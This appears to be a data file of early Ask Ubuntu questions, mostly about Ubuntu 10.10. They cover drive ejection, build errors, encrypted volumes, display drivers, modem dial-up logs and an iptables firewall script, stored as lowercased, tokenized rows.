5845	what is the difference between `` unmount '' , `` eject '' , `` safely remove drive '' and the eject icon ?	when i right-click the desktop icon for my usb drive or sd card i have the choice to `` eject '' or `` safely remove drive '' : in the tree side pane in nautilus , i can either `` unmount '' or `` eject '' : the places side pane in nautilus has some kind of eject icon : what do all of these do ? specifics i 've been wondering about include : what happens when a drive has multiple partitions mounted ? under what conditions is a prompt to empty the trash displayed ? do any of these result in a state in which the drive can not be mounted again without first being physically reconnected ?
5847	how to resolve 'gdk-pixbuf/gdk-pixbuf.h : no such file or directory '	i am trying to compile chromium source on ubuntu 10.10 . but i get this `` gdk-pixbuf/gdk-pixbuf.h : no such file or directory '' error . can you please tell how can i fix it ? i have the '/usr/include/gtk-2.0/gdk/gdkpixbuf.h ' , so i should have gdkpixbuf dev package right ? ( since it said '/usr/include/gtk-2.0/gdk/gdkpixbuf.h:37 : fatal error : gdk-pixbuf/gdk-pixbuf.h : no such file or directory' $ make out/debug/chrome cxx ( target ) out/debug/obj.target/app_base/app/active_window_watcher_x.o in file included from /usr/include/gtk-2.0/gdk/gdkcairo.h:28 , from /usr/include/gtk-2.0/gdk/gdk.h:33 , from app/active_window_watcher_x.cc:6 : /usr/include/gtk-2.0/gdk/gdkpixbuf.h:37 : fatal error : gdk-pixbuf/gdk-pixbuf.h : no such file or directory compilation terminated . make : *** [ out/debug/obj.target/app_base/app/active_window_watcher_x.o ] error 1
5850	how does ubuntu handle looking at a windows raid ?	if i install ubuntu on hard drive a and mount ( via nautilus ) hard drive b that has windows 7 installed on it with a raid1 , could ubuntu even remotely screw up the raid controller ? or would it look at it like a normal single hard drive not in raid ? i believe the raid 1 is fakeraid since i do n't have a hardware raid controller card . i ca n't afford to risk losing the raid1 setup so i 'm just double checking . ^^ -thanks
5853	how do i group/un-group parent/child windows ?	i was rummaging around in gconf-editor yesterday , and i noticed a setting to group or un-group a set of windows ... ( but i forget the exact key-name ) this setting was something which looked like a swtich to the default behavioural difference between ubuntu and windows ... it was called something like : group windows/dialogs i switched to `` group '' . this locks a child window/dialog to the parent , so that it appears `` on-top '' of the parent ( which is pretty much the ms-windws standard ) . i thought i 'd try it out , to see which mode i preferred ... an typical example of the `` grouped '' behaviour is : an open-file dialog is forced to stay on top of its parent , until it is closed . 24 hours later , i 've decided i prefer the default ubuntu way ... but i ca n't find that option again . does anyone know which/where it is ?
5855	is my system fully upgraded ?	i have this sinking feeling that my system is n't fully upgraded to the released 10.10 . if nothing else i am missing the ubuntu font family . it just feels like some things are n't updating . i do n't know if from release to release , beta to lts , there are n't that many updates but i certainly have n't been seeing long lists when i start my update manager . i just do n't feel like i 'm upgraded/updated to the lts 10.10 . how can i check ? and if not , how can i update ?
5859	is is possible to export inkscape files for indesign ?	i was wondering if it was possible to export anything built in inkscape to indesign cs or cs5 . if it is possible , how can i get it to work ?
5861	/etc/crypttab not working	i used the disk utility to create an encrypted volume on an external drive . when i click the unlock volume button in that program , it mounts the drive for me . now , i want to automate this process so that it will happen at boot-up . when i run sudo cryptsetup luksuuid /dev/sdb1 , i get this : ca709269-1e3e-4e9e-9e08-7248f0e6c5a6 so , i create /etc/crypttab like this : backup_drive uuid=ca709269-1e3e-4e9e-9e08-7248f0e6c5a6 none and i added this line to /etc/fstab : /dev/mapper/backup_drive /mnt/backup ext3 default 0 2 when i reboot , ubuntu tells me that the device is not available to map , so i tell it to skip it . it appears that the /etc/crypttab is not getting run correctly . how can i debug this ?
5862	eclipse writing to .gvfs directory results in empty file	i use eclipse ide ( zend studio to be exact ) for editing code on my development servers . because we have internal development servers , i connect to them via ssh and use the .gvfs folder in my home directory to access the files through eclipse . i.e : /home/s.rees/.gvfs/sftp for s.rees on internal.dev/var/www before upgrading to 10.10 maverick i was fine reading and writing the files , but now any time it goes to save a file i get an empty file as a result . making it impossible to do any work ... i do n't know if this is a bug or a wacky feature ( that can be disabled ? ) ... or where i need to report it as such if it is a bug . any ideas ?
5865	does gnome-do ( with the docky theme ) work well with 10.10 maverick ?	since development of gnome-do has halted while the world continues to spin , i was wondering if there are any compatibility issues with the docky theme of gnome-do ( as opposed to docky `` proper '' ) in maverick ? i much prefer do to docky , and would rather continue using it .
5866	what terminal command will dump all gconf keys and values ? ie the ones seen in gconf-editor	i can output a single key-value , as per the following example : gconftool-2 -- get /apps/panel/applets/clock_screen0/object_type bonobo-applet how can i dump the entire gconf database ? ... key-names and values
5868	which logs should i pay attention to ?	there are many logs in /var/log/ for a standard home installation , which ones should i be checking regularly ?
5870	can i update directly from ubuntu 9.10 to 10.10 ?	i was using ubuntu 9.10 version and today i want to upgrade to 10.10 . i updated my ubuntu 9.10 with this commands : sudo aptitude install ubuntu-desktop sudo aptitude update & & sudo aptitude safe-upgrade update-manager -d but when i opened update manager i could n't see button for upgrading to 10.10 ( or 10.04 ) will be available . how can i upgrade now ?
5873	upgrade to maverick broke the display resolution - dell studio	my system used to display the full hd resolution - the native , very well on the karmic . i upgraded my system to maverick and the maximum 16:9 resolution x server supports is 1280x720 . as far as i can remember , i did n't have to do any changes for the display back when i originally installed 10.04 . from the lspci , the graphics card i have is the one follows : 02:00.0 vga compatible controller : ati technologies inc manhattan [ mobility radeon hd 5000 series ] how can i get back the high native resolution ?
5876	is a dell inspiron 13z compatible with ubuntu 10.10 ?	i 'm thinking about buying a dell inspiron 13z - i basically want a small , light laptop for programming while i travel to and from work . i 'm just looking for reassurance that all of the hardware is supported . spec from http : //www1.ap.dell.com/au/en/home/notebooks/inspiron-13z-intel/pd.aspx ? refid=inspiron-13z-intel & s=dhs & cs=audhs1 & ~ck=mn intel core i5-470um ( 1.33ghz , turbo boost up to 1.86ghz , 3m cache ) standard 4gb ( 2 x 2 gb ) 2 dimm ddr3 1333mhz chipset : intel速 hm57 graphics : ati mobility radeontm hd5430 - 1gb wireless : dell wireless 1501 802.11b/g/n half mini card ( standard ) thanks .
5881	acer aspire 1551 will not wake after suspend	i have an acer aspire 1551-5448 netbook that is running ubuntu 10.10 64bit desktop . i 'm loving making the move to ubuntu but my major stopping point is waking the laptop from a suspend/hibernate mode . when waking the computer i get a black screen . i understand this is most likely a hardware issue and would like to note that i am using the ati drivers . also , i checked the /var/log/pm-suspend.log and everything seems normal , meaning i am not seeing any failures . any ideas where i should look next ?
5882	can i make links to email addresses open gmail instead of evolution ?	when i click on a link to an email address in firefox or google chrome a `` welcome to evolution '' screen appears . can i make gmail open instead , or at the very least disable evolution from running ?
5884	how do i get seamless mode working under oracle vm virtualbox ?	i 'm use oracle vm virtualbox 3.2.8 ( puel ) on my windows 7 as host . i use seamless mode almost exclusively , and post upgrade to ubuntu 10.10 the seamless mode is broken . is there a way i can fix this or do i need to wait for the next release of virtualbox ? ( ps : i have looked at lifehacker 's article and other related blog posts , and none of them work for me )
5887	can i try out the netbook edition 's interface from the desktop edition ?	i 'm running ubuntu desktop 10.10 , but i just saw a screenshot of ubuntu netbook edition and i 'd like to try it out . is it possible to install just the netbook desktop interface and then switch between it and the normal gnome desktop ?
5889	execute a script when memory peaks ?	i do n't have a lot of memory and sometimes , when i play video games , its get full and my computer start freezing , anything i do take more than 1 minutes before getting done that include mouse move and mouse click . so what i want is to be able to kill some process i use and i know i can kill ( like my internet browser ) before the memory get full so i have little more space left . do you know a way to do it ? in technical terms , what i want is that when the memory is almost full it trigger a script that will send a sigterm ( order to close ) to my internet browser so my pc do n't freeze and i can choose to save whatever i 'm doing and reopen my browser or forget about my browser . thanks for your help .
5901	cebu city not an option in weather applet	i do n't get it . why does the options for cities under philippines not include cebu city when it is the 2nd largest city next to manila ? how do we get this included in the weather applet options ?
5907	apple magic trackpad multitouch configuration	today i installed the ubuntu 10.10 release on my desktop pc . i was running ubuntu 10.04 lts with an apple magic trackpad and everything was working fine . after today 's fresh installation of ubuntu 10.10 , i do n't see my apple magic trackpad 's multitouch working . two-finger scrolling and three-finger third mouse button clicking are completely broken . has anyone else experienced a similar issue ? has anyone had success with ubuntu 10.10 and an apple magic trackpad ? please help me to fix this issue . your help is highly appreciated ...
5909	ca n't set screen resolution	i 'm having problems setting my correct monitor resolution as the correct one is n't available from preferences - > monitor . i 'm running a geforce 440 mx , and there does n't appear to be any correct driver for it . jockey can not find anything and the 96 driver does n't work . my correct resolution should be 1440*900 . thank-you .
5911	video editing software options ?	what video editing software would you recommend on ubuntu ( or linux in general ) and why ? it can be for either beginners or experienced users . please only place one piece of software per response and include details to what makes it great !
5917	add repository to ubuntu from terminal with pgp key	how do i add the pgp key from a terminal ? i have added the deb http : //badgerports.org lucid main to sources.list and when i do a sudo apt-get update i get w : gpg error : http : //badgerports.org lucid release : the following signatures could n't be verified because the public key is not available : no_pubkey c90f9cb90e1fad0c this is the key i need to add http : //badgerports.org/directhex.ppa.asc
5929	how big should i make my swap partition ?	i 'm ( re ) installing ubuntu on my toshiba nb100 netbook ( intel atom , 120gb hd , 2gb ram ) . already have a partition i call `` stuff '' with all my media and docs . will be deleting the one i had win7 on ( making it the swap ) , and then there is a recovery one . how big a swap partition should i create ?
5930	what are the differences between the git and git-core packages ?	why there is a git package and a git-core package ? is there any difference ?
5932	upgrading mono on lucid ? getting `` version 2.4 ( tarball fri oct 2 12:47:18 cest 2009 ) ''	im having some issues when trying to upgrade mono i have added to the sources.list deb http : //badgerports.org lucid main tryed upgrade , seemd to runed fine , but i get mono -v mono jit compiler version 2.4 ( tarball fri oct 2 12:47:18 cest 2009 ) copyright ( c ) 2002-2008 novell , inc and contributors . www.mono-project.com tls : __thread gc : included boehm ( with typed gc ) sigsegv : altstack notifications : epoll architecture : x86 disabled : none and when doing again , i says already newest version . # apt-get install mono-runtime mono-2.0-devel reading package lists ... done building dependency tree reading state information ... done mono-runtime is already the newest version . mono-2.0-devel is already the newest version . the following packages were automatically installed and are no longer required : python-rpm rpm python-urlgrabber use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . any one got a sugestion on how to get this fixed ? i have tryed apt-get purge mono-runtime mono-2.0-devel and done a reinstall but still same version
5938	how can i do mass installs on multiple computers ?	i had promissed my 120 students that i will install ubuntu 10.10 on their laptops but failed to do it.the laptops were dell vostro 4014 . all have same hardware . i took one laptop and installed ubuntu and all the necessary packages , and also wine to run some windows software . i selected the default ext4 file system . then i tried to use clonezilla server to clone the installation . clonezilla server shows boot menu splash screen , but later on it says that i might be having a latest nic unsupported by the kernel . but the nic of the laptop on which i had installed ubuntu works fine . later i tried to use the clonezilla live cd to boot the laptop which has ubuntu . but when i press 'y ' to start cloning , it says 'something went wrong ' . again i tried the 'dd ' command to save as disk image . but it copies empty space . so it is not feasible for me as it takes really long time . i have made my students to wait for many days , daily they are coming and asking whether my setup is ready . today i realized i ca n't do it . i have in a way convinced them not to go for windows . so they are waiting for me to have ubuntu installed on their laptops . today evening some of them will come to collect the laptops i took from them to install ubuntu . do n't know how and what to tell them .
5942	if you tried to use ubuntu then went back to your old os , why did you do so ?	over the past few years i 've been dipping in and out of ubuntu every so often because i believe in the idea . however , there have always been factors that have made me give up and return to either windows or os x , intending to come back when ubuntu has had a bit more time to 'bake ' . anecdotally , if you have had similar experiences , why did you go back ? if we can address these sorts of issues , maybe ubuntu can get over this hump . i mean 'chasm ' .
5947	how do i install the empathy smilies ( from maverick ) in pidgin ?	how do i install the empathy smilies ( from maverick ) in pidgin ? i really like the look of them .
5949	network proxy is not applied	i 'm trying to make the update manager work through the proxy on my ubuntu 9.10 . i 've tried what was suggested in this question , but the update manager still reports 409 conflict . would really appreciate if anybody could help me with this . the window manager solution turned out to simple : system- > administration- > synaptic package manager , then in the synaptic window settings- > preferences- > network . manually enter the http_proxy field . and it works now . still am curious as to how to do this from command line though .
5951	how do i install the global appmenu ( mac menu ) ?	anyone knows how to install globalmenu on ubuntu 10.10 ?
5953	how can i get ffserver to work ?	i have a mp4 file which i wish to compress , resize and stream via rtsp . my ffserver.conf file looks like this : port 9091 rtspport 5454 bindaddress 0.0.0.0 maxhttpconnections 2000 maxclients 1000 maxbandwidth 1000 customlog - nodaemon < feed feed1.ffm > file /tmp/feed1.ffm filemaxsize 500m < /feed > < stream live.mpeg > format rtp file `` /tmp/rtp.mp4 '' feed feed1.ffm videocodec mpeg2video videoframerate 15 videobitrate 200 videosize 400x320 # audiocodec mp2 # audiobitrate 32 # audiochannels 2 # audiosamplerate 22050 noaudio # preroll 10 acl allow 127.0.0.1 < /stream > < stream stat.html > format status # only allow local people to get the status acl allow localhost acl allow 192.168.0.0 192.168.255.255 < /stream > from what i understand , i do n't need to feed in a video stream using ffmpeg as i am using the file attribute , so ffserver does the work for me ? when i try to use totem to playback the video ( ffplay just times-out ) , i get the following error : $ totem rtsp : //127.0.0.1:5454/live.mpeg ** message : error : could not read from resource . gstrtspsrc.c ( 4408 ) : gst_rtspsrc_send ( ) : /gstplaybin2 : play/gsturidecodebin : uridecodebin0/gstrtspsrc : source : got error response : 454 ( session not found ) . ffserver 's log looks like this : $ ffserver -f /tmp/ffserver.conf ffserver version 0.6-4:0.6-2ubuntu6 , copyright ( c ) 2000-2010 the ffmpeg developers built on oct 5 2010 22:36:53 with gcc 4.4.5 configuration : -- extra-version=4:0.6-2ubuntu6 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-vaapi -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-gpl -- enable-postproc -- enable-x11grab -- enable-libdc1394 -- enable-shared -- disable-static warning : library configuration mismatch libavutil configuration : -- extra-version=4:0.6-2ubuntu3 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libdirac -- enable-libgsm -- enable-libopenjpeg -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-vaapi -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-libmp3lame -- enable-gpl -- enable-postproc -- enable-x11grab -- enable-libfaad -- enable-libxvid -- enable-libx264 -- enable-librtmp -- enable-libdc1394 -- enable-shared -- disable-static libavcodec configuration : -- extra-version=4:0.6-2ubuntu3 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libdirac -- enable-libgsm -- enable-libopenjpeg -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-vaapi -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-libmp3lame -- enable-gpl -- enable-postproc -- enable-x11grab -- enable-libfaad -- enable-libxvid -- enable-libx264 -- enable-librtmp -- enable-libdc1394 -- enable-shared -- disable-static libavutil 50.15 . 1 / 50.15 . 1 libavcodec 52.72 . 2 / 52.72 . 2 libavformat 52.64 . 2 / 52.64 . 2 libavdevice 52 . 2 . 0 / 52 . 2 . 0 libavfilter 1.19 . 0 / 1.19 . 0 libswscale 0.11 . 0 / 0.11 . 0 libpostproc 51 . 2 . 0 / 51 . 2 . 0 sun oct 10 12:37:20 2010 ffserver started . sun oct 10 12:38:34 2010 127.0.0.1 - - [ describe ] `` rtsp : //127.0.0.1:5454/live.mpeg rtsp/1.0 '' 200 166 sun oct 10 12:38:38 2010 127.0.0.1:51118 - - `` play live.mpeg/streamid=0 rtp/udp '' sun oct 10 12:38:38 2010 127.0.0.1 - - [ ] `` rtp/udp '' 200 0 sun oct 10 12:38:43 2010 127.0.0.1 - - [ teardown ] `` rtsp : //127.0.0.1:5454/live.mpeg rtsp/1.0 '' 200 819 sun oct 10 12:38:43 2010 127.0.0.1:0 - - `` play live.mpeg/streamid=0 rtp/tcp '' sun oct 10 12:38:43 2010 127.0.0.1 - - [ ] `` rtp/tcp '' 200 0 sun oct 10 12:38:54 2010 127.0.0.1 - - [ play ] `` rtsp : //127.0.0.1:5454/live.mpeg rtsp/1.0 '' 200 621 what am i doing wrong ?
5956	login problem ( the login screen shows again )	i upgraded to 10.10 , but i ca n't login to gnome . the login screen shows and i choose myself . then the screen goes black , and the login screen shows again .
5958	why is the default background image named `` warty-final-ubuntu.png '' ?	why is the default background image still named /usr/share/backgrounds/warty-final-ubuntu.png ? it 's not warty , and it 's not even a png : $ file /usr/share/backgrounds/warty-final-ubuntu.png /usr/share/backgrounds/warty-final-ubuntu.png : jpeg image data , jfif standard 1.02
5960	what 's the best approach to triggering a distro upgrade for an oem build ?	the product i develop for work is a customised ubuntu 8.04 lts system with a number of back ported packages and a number of our own for the application specific stuff . now that 10.04 has been released it 's time to start thinking about how we move our customers towards the latest lts release . i 'm currently considering the best approach to do this , preferably all triggered from a package upgrade . i currently have a `` meta '' package which contains a number of prerequisites for our flavour of ubuntu . i was thinking of issuing updated version of this in our current repo with a few upgrade scripts to be run from postinst . this would trigger the distro upgrade and then switch the custom repo bits to point to the new packages directory built against 10.04 . is there a command line for trigger the distro upgrade ? is this the best way to proceed ?
5970	can i download a file from a package without installing it ?	if i want , for example , /usr/share/doc/nvidia-96/readme.txt.gz from nvidia-96 , is there a way for me to download just this file ?
5972	upgrade to maverick broke the display	after upgrading my dell studio laptop with ati graphics from 10.04 to 10.10 i get a low res boot logo ( 10.10 with four full stops under it ) followed by a blank purple screen . i can log in `` blind '' and hear it load my desktop but the screen stays purple . i also ca n't see the command line if i hit ctrl-shift-1 etc . any ideas how to fix this . i 'm guessing it 's an ati graphics driver issue of some kind . thanks !
5976	how can i list all packages i 've installed from a particular ppa ?	how can i list all packages i 've installed from a particular ppa ? command-line answers preferred . related question : how can i list all installed packages that are not available from the main ubuntu archives , and also see which repositories they came from ? ( if i knew the answer to this question , i could grep that list for a particular ppa name to find out the answer to my first question . )
5980	how do i free up disk space ?	my ubuntu cloud server has left only 900mb of disk space . i 'll just empty the directory /tmp and wondering if there is any other location to clean up .
5983	error in software sources	when i try to open update manager , i get the error : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : type 'ain ' is not known on line 1 in source list /etc/apt/sources.list.d/globalmenu-team-ppa-maverick.list' `` the problem is , i 've removed those globalmenu ppa from software sources , but it seems they 're still there however i do n't see them in list . now i ca n't update the system , ca n't open software center , simply ca n't do anything useful with ppa ( i can only access software sources using terminal ) ... if you have any ideas , i will be very grateful .
5985	replace docky 's icon by ubuntu icon	how can i replace docky 's standard anchor icon in the dock by ubuntu 's ? it would look quite nice i think . this is how it looks right now :
5989	how can i setup nightly backups via the command line ?	i 'm running ubuntu server and i 'm looking for an efficient way of performing nightly backups of particular directories using cron . however , since the computer is n't always on , i 'd like it to just run when the computer is on and to keep the last 5 backups . would i need to use a bash script of some kind to achieve this ?
5990	install packages without internet	how do i install ubuntu packages from the ubuntu cd . i have ubuntu-desktop 10.04 running and i have to install wvdial package but no internet connection for installing from apt repository .
5996	unable to mount /dev/loop0 during install	i was installing 32-bit ubuntu ( ubuntu-10.10-desktop-i386.iso ) on vmware workstation 7.1 . during installation an error came up with the following text . ( initramfs ) mount : mounting dev/loop0 on //filesystem.squashfs failed : input/output error can not mount /dev/loop0 ( /cdrom/casper/filesystem.squashfs ) on //filesystem.squashfs i did a memory test which was successful , but when selecting `` try ubuntu without installing '' , `` install ubuntu '' or `` check disk for defects '' the same error is showing up . i download the iso image from ubuntu website `` http : //www.ubuntu.com/desktop/get-ubuntu/download '' . as i could n't find the checksum data , the iso image was verified by mounting to a virtual drive and browsing the contents . the iso image is mounted to a virtual drive in vmware and not burnt to a cd .
5998	window decorations disappeared ?	yesterday everything was fine and today when i logged on to my ubuntu 10.10 i noticed that the icons in the top of each menu dissapeared ( i mean the the bar where the close mini maize etc.. ) this problem is not new for me in ubuntu 10.10 but it also happened in ubuntu 10.04 so please if somebody knows how to fix this post the answer
6001	how to configure tata photon+ ec1261 huawei	i 'm running ubuntu 10.04 . i have a newly purchased tata photon+ internet connection which supports windows and mac . on the internet i found a article saying that it could be configured on linux . i followed the steps to install it on ubuntu from this link . i am still not able to get online , and need some help . also , it is very slow , but i was told that i would see speeds up to 3.1mb . i dont have wvdial installed and can not install it from apt as i 'm not connected to internet booting from windows i dowloaded `` wvdial '' .deb package and tried to install on ubuntu but it 's ended with dependency problem . automatically , do n't know how , i got connected to internet only for once . immediately i installed wvdial package after this i followed the tutorials ( i could not browse and upload the files here ) . from then it 's showing that the device is connected in the network connections but no internet connection . once i disable the device , it wo n't show as connected again and i 'll have to restart my system . sometimes the device itself not detected ( wondering if there is any command to re-read the all devices ) . output of wvdialconf /etc/wvdial.cof : # wvdialconf /etc/wvdial.conf editing `/etc/wvdial.conf ' . scanning your serial ports for a modem . ttys0 < *1 > : atq0 v1 e1 -- failed with 2400 baud , next try : 9600 baud ttys0 < *1 > : atq0 v1 e1 -- failed with 9600 baud , next try : 115200 baud ttys0 < *1 > : atq0 v1 e1 -- and failed too at 115200 , giving up . modem port scan < *1 > : s1 s2 s3 wvmodem < *1 > : can not get information for serial port . ttyusb0 < *1 > : atq0 v1 e1 -- failed with 2400 baud , next try : 9600 baud ttyusb0 < *1 > : atq0 v1 e1 -- failed with 9600 baud , next try : 9600 baud ttyusb0 < *1 > : atq0 v1 e1 -- and failed too at 115200 , giving up . wvmodem < *1 > : can not get information for serial port . ttyusb1 < *1 > : atq0 v1 e1 -- failed with 2400 baud , next try : 9600 baud ttyusb1 < *1 > : atq0 v1 e1 -- failed with 9600 baud , next try : 9600 baud ttyusb1 < *1 > : atq0 v1 e1 -- and failed too at 115200 , giving up . wvmodem < *1 > : can not get information for serial port . ttyusb2 < *1 > : atq0 v1 e1 -- ok ttyusb2 < *1 > : atq0 v1 e1 z -- ok ttyusb2 < *1 > : atq0 v1 e1 s0=0 -- ok ttyusb2 < *1 > : atq0 v1 e1 s0=0 & c1 -- ok ttyusb2 < *1 > : atq0 v1 e1 s0=0 & c1 & d2 -- ok ttyusb2 < *1 > : atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 -- ok ttyusb2 < *1 > : modem identifier : ati -- manufacturer : +gmi : huawei technologies co. , ltd ttyusb2 < *1 > : speed 9600 : at -- ok ttyusb2 < *1 > : max speed is 9600 ; that should be safe . ttyusb2 < *1 > : atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 -- ok found a modem on /dev/ttyusb2 . modem configuration written to /etc/wvdial.conf . ttyusb2 < info > : speed 9600 ; init `` atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 '' output of wvdial : # wvdial -- > wvdial : internet dialer version 1.60 -- > can not get information for serial port . -- > initializing modem . -- > sending : atz atz ok -- > sending : atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 ok -- > sending : at+crm=1 at+crm=1 ok -- > modem initialized . -- > sending : atdt # 777 -- > waiting for carrier . atdt # 777 connect -- > carrier detected . starting ppp immediately . -- > starting pppd at sat oct 16 15:30:47 2010 -- > pid of pppd : 5681 -- > using interface ppp0 -- > pppd : ( u ; [ 08 ] @ s ; [ 08 ] ` { ; [ 08 ] -- > pppd : ( u ; [ 08 ] @ s ; [ 08 ] ` { ; [ 08 ] -- > pppd : ( u ; [ 08 ] @ s ; [ 08 ] ` { ; [ 08 ] -- > pppd : ( u ; [ 08 ] @ s ; [ 08 ] ` { ; [ 08 ] -- > pppd : ( u ; [ 08 ] @ s ; [ 08 ] ` { ; [ 08 ] -- > pppd : ( u ; [ 08 ] @ s ; [ 08 ] ` { ; [ 08 ] -- > local ip address 14.96.147.104 -- > pppd : ( u ; [ 08 ] @ s ; [ 08 ] ` { ; [ 08 ] -- > remote ip address 172.29.161.223 -- > pppd : ( u ; [ 08 ] @ s ; [ 08 ] ` { ; [ 08 ] -- > primary dns address 121.40.152.90 -- > pppd : ( u ; [ 08 ] @ s ; [ 08 ] ` { ; [ 08 ] -- > secondary dns address 121.40.152.100 -- > pppd : ( u ; [ 08 ] @ s ; [ 08 ] ` { ; [ 08 ] output of log message /var/log/messages : oct 16 15:29:44 avyakta-desktop pppd [ 5119 ] : secondary dns address 121.242.190.180 oct 16 15:29:58 desktop pppd [ 5119 ] : terminating on signal 15 oct 16 15:29:58 desktop pppd [ 5119 ] : connect time 0.3 minutes . oct 16 15:29:58 desktop pppd [ 5119 ] : sent 0 bytes , received 177 bytes . oct 16 15:29:58 desktop pppd [ 5119 ] : connection terminated . oct 16 15:30:47 desktop pppd [ 5681 ] : pppd 2.4.5 started by root , uid 0 oct 16 15:30:47 desktop pppd [ 5681 ] : using interface ppp0 oct 16 15:30:47 desktop pppd [ 5681 ] : connect : ppp0 < -- > /dev/ttyusb2 oct 16 15:30:47 desktop pppd [ 5681 ] : chap authentication succeeded oct 16 15:30:47 desktop pppd [ 5681 ] : chap authentication succeeded oct 16 15:30:48 desktop pppd [ 5681 ] : local ip address 14.96.147.104 oct 16 15:30:48 desktop pppd [ 5681 ] : remote ip address 172.29.161.223 oct 16 15:30:48 desktop pppd [ 5681 ] : primary dns address 121.40.152.90 oct 16 15:30:48 desktop pppd [ 5681 ] : secondary dns address 121.40.152.100 edit 1 : i tried the following sudo stop network-manager sudo killall modem-manager sudo /usr/sbin/modem-manager -- debug > ~/mm.log 2 > & 1 & sudo /usr/sbin/networkmanager -- no-daemon > ~/nm.log 2 > & 1 & output of mm.log : # vim ~/mm.log : ** message : loaded plugin option high-speed ** message : loaded plugin option ** message : loaded plugin huawei ** message : loaded plugin longcheer ** message : loaded plugin anydata ** message : loaded plugin zte ** message : loaded plugin ericsson mbm ** message : loaded plugin sierra ** message : loaded plugin generic ** message : loaded plugin gobi ** message : loaded plugin novatel ** message : loaded plugin nokia ** message : loaded plugin motoc output of nm.log : # vim ~/nm.log : networkmanager : < info > starting ... networkmanager : < info > modem-manager is now available networkmanager : scplugin-ifupdown : init ! networkmanager : scplugin-ifupdown : update_system_hostname networkmanager : scpluginifupdown : guessed connection type ( eth0 ) = 802-3-ethernet networkmanager : scplugin-ifupdown : update_connection_setting_from_if_block : name : eth0 , type:802-3-ethernet , id : ifupdown ( eth0 ) , uuid : 681b428f-beaf-8932-dce4-678ed5bae28e networkmanager : scplugin-ifupdown : addresses count : 1 networkmanager : scplugin-ifupdown : no dns-nameserver configured in /etc/network/interfaces networkmanager : nm-ifupdown-connection.c.119 - invalid connection read from /etc/network/interfaces : ( 1 ) addresses networkmanager : scpluginifupdown : management mode : unmanaged networkmanager : scplugin-ifupdown : devices added ( path : /sys/devices/pci0000:00/0000:00:14.4/0000:02:02.0/net/eth1 , iface : eth1 ) networkmanager : scplugin-ifupdown : device added ( path : /sys/devices/pci0000:00/0000:00:14.4/0000:02:02.0/net/eth1 , iface : eth1 ) : no ifupdown configuration found . networkmanager : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/lo , iface : lo ) @
6004	iptables & nmap on ubuntu	the following are my iptable rules on a ubuntu cloud server : cat /etc/iptables.rules : *filter : input drop [ 598:41912 ] : forward accept [ 0:0 ] : output accept [ 456:35354 ] -a input -i lo -j accept -a input -p tcp -m tcp -- dport 80 -j accept -a input -m state -- state related , established -j accept -a input -m state -i eth0 -- state established , related -j accept -a input -s mycompany.dyndns.com -p tcp -m tcp -- dport 22 -j accept -a input -s mycompany.dyndns.com -p tcp -m tcp -- dport 3306 -j accept -a input -s mycompany.dyndns.com -p tcp -m tcp -- dport 10000 -j accept -a input -j drop commit i did not open the ftp port 21 in the above iptable rules but i 'm allowed to connect to the server via ftp . how ? nmap server-ip not shown : 987 closed ports port state service 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 135/tcp filtered msrpc 139/tcp filtered netbios-ssn 389/tcp open ldap 445/tcp filtered microsoft-ds 10000/tcp open java-or-otgfileshare 2401/tcp open cvspserver 3306/tcp open mysql nmap done : 1 ip address ( 1 host up ) scanned in 17.46 seconds why these many ports are shown as open . i 'm clear that these services are running on the server but how it could list or connect ( ftp ) these ports when it is not included in the iptable rules ? . need help ... the following script will be running at every 5 mins on cloud servers to update their iptables for the dyndns domain name : # ! /bin/bash # # a script to update iptable records for dynamic dns hosts . # written by : dave horner ( http : //dave.thehorners.com ) # released into public domain . # # run this script in your cron table to update ips . # # you might want to put all your dynamic hosts in a sep. chain . # that way you can easily see what dynamic hosts are trusted . # # create the chain in iptables . /sbin/iptables -n dynamichosts # insert the chain into the input chain @ the head of the list . /sbin/iptables -i input 1 -j dynamichosts # flush all the rules in the chain /sbin/iptables -f dynamichosts host= $ 1 hostfile= '' /root/host- $ host '' chain= '' dynamichosts '' # change this to whatever chain you want . iptables= '' /sbin/iptables '' # check to make sure we have enough args passed . if [ `` $ { # @ } '' -ne `` 1 '' ] ; then echo `` $ 0 hostname '' echo `` you must supply a hostname to update in iptables . '' exit fi # lookup host name from dns tables ip=`/usr/bin/dig +short $ host | /usr/bin/tail -n 1` if [ `` $ { # ip } '' = `` 0 '' ] ; then echo `` could n't lookup hostname for $ host , failed . '' exit fi oldip= '' '' if [ -a $ hostfile ] ; then oldip=`cat $ hostfile` # echo `` cat returned : $ ? '' fi # save off new ip . echo $ ip > $ hostfile echo `` updating $ host in iptables . '' if [ `` $ { # oldip } '' ! = `` 0 '' ] ; then echo `` removing old rule ( $ oldip ) '' ` $ iptables -d $ chain -s $ oldip/32 -j accept` fi echo `` inserting new rule ( $ ip ) '' ` $ iptables -a $ chain -s $ ip/32 -j accept` this is the output of `` ipables -l '' on the cloud server . dynamichosts all -- anywhere anywhere dynamichosts all -- anywhere anywhere dynamichosts all -- anywhere anywhere dynamichosts all -- anywhere anywhere dynamichosts all -- anywhere anywhere accept all -- anywhere anywhere accept tcp -- anywhere anywhere tcp dpt : www accept all -- anywhere 